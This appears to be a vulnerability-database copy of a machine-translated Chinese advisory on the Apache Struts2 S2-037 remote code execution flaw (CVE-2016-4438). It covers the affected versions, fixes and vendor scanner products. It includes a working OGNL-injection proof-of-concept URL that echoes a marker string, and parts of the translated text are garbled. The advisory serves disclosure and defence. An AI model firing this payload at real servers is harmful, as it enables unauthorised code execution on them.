Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:62201676305
HistoryJun 27, 2016 - 12:00 a.m.

WVSS and RSAS to help you quickly detect Apache Struts2 remote code execution vulnerability S2-0 3 7-vulnerability warning-the black bar safety net

2016-06-2700:00:00
佚名
www.myhack58.com
14
JSON

Apache Struts2 using the REST plugin the cases, the attacker uses REST calls malicious expression can be remote code execution. The vulnerability number CVE-2 0 1 6-4 4 3 8, Set Name, S2-0 3 to 7. The vulnerability and S2-0 3 3 vulnerability to trigger the process is basically the same, are in the ActionMapping in the methodName into the OGNL expression execution, leading to arbitrary code execution. You also can’t quickly confirm your business is secure? WVSS and RSAS to help you quickly identify risks.

Vulnerability overview

Apache Struts2 then exposed a remote code execution vulnerability, an attacker can use the REST plug-in calls a malicious expression remote code execution. This vulnerability number CVE-2 0 1 6-4 4 3 8, named S2-0 3 to 7.

Vulnerability range

! Global distribution

Struts 2.3.20-Struts 2.3.28.1

All install the REST plugin of Struts application

The exploit poc

http://127.0.0.1:8080/struts2-rest-showcase/orders/3//%23_memberAccess%[email protected]@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context[%23parameters. obj%5B0%5D,%5D. getWriter(),%23wr. print(%23parameters. content%5B0%5D%2b602%2b53718%2b1239876),%23wr. close(),xx. toString. json?& amp;obj=com. opensymphony. xwork2. dispatcher. HttpServletResponse&content=paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt reponse echoed paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt i.e., the presence of the vulnerability.

Detect method

Nsfocus customers can use the green Alliance Web application vulnerability scanning systems, NSFOCUS WVSS and the green Alliance remote security assessment system(NSFOCUS RSAS)detects its own application system is the existence of vulnerabilities. The green Alliance Web application vulnerability scanning systems, NSFOCUS WVSS and the green Alliance remote security assessment system(NSFOCUS RSAS)have been in vulnerabilities were exposed for the first time within the perfect realization of the vulnerability detection capability, you can update the plug-in Library for fast, accurate and full scan found.

! Exploit name

Fix method

1 added cleanupActionName filter;

2 Using a Web application firewall, etc. securitydevices for protection;

3 attention to Apache’s website and timely update to struts2. 3. 2 9: The https://struts.apache.org/

Refer to the official notice:
https://cwiki.apache.org/confluence/display/WW/s2-037

JSON